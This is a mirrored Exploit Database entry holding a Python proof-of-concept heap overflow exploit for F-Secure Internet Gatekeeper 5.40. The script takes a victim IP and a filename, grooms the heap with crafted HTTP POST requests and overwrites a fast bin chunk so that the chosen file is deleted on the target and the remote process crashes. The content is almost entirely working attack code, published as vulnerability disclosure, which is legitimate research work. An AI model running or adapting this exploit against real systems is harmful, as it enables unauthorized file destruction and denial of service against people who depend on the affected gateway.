F-Secure Internet Gatekeeper 5.40 – Heap Overflow (PoC)

• Exploit Database
• 14 阅读

• 作者： Kevin Joensen
  日期： 2020-02-04
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47996/

• # Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
  # Date: 2020-01-30
  # Author: Kevin Joensen
  # Vendor: F-Secure
  # Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
  # CVE: N/A
  # Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
  
  from pwn import *
  import time
  import sys
  
  
  
  def send_payload(payload, content_len=21487483844, nofun=False):
  r = remote(sys.argv[1], 9012)
  r.send("POST / HTTP/1.1\n")
  r.send("Host: 192.168.0.122:9012\n")
  r.send("Content-Length: {}\n".format(content_len))
  r.send("\n")
  r.send(payload)
  if not nofun:
  r.send("\n\n")
  return r
  
  
  def trigger_exploit():
  print "Triggering exploit"
  payload = ""
  payload += "A" * 12 # Padding
  payload += p32(0x1d)# Fast bin chunk overwrite
  payload += "A"* 488 # Padding
  payload += p32(0xdda00771)# Address of payload
  payload += p32(0xdda00771+4)# Junk
  r = send_payload(payload)
  
  
  
  def massage_heap(filename):
  print "Trying to massage the heap....."
  for x in xrange(100):
  payload = ""
  payload += p32(0x0) # Needed to bypass checks
  payload += p32(0x0) # Needed to bypass checks
  payload += p32(0xdda0077d)# Points to where the filename will be in memory
  payload += filename + "\x00"
  payload += "C"*(0x300-len(payload))
  r = send_payload(payload, content_len=0x80000, nofun=True)
  r.close()
  cut_conn = True
  print "Heap massage done"
  
  
  if __name__ == "__main__":
  if len(sys.argv) != 3:
  print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
  print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
  exit()
  massage_heap(sys.argv[2])
  time.sleep(1)
  trigger_exploit()
  print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])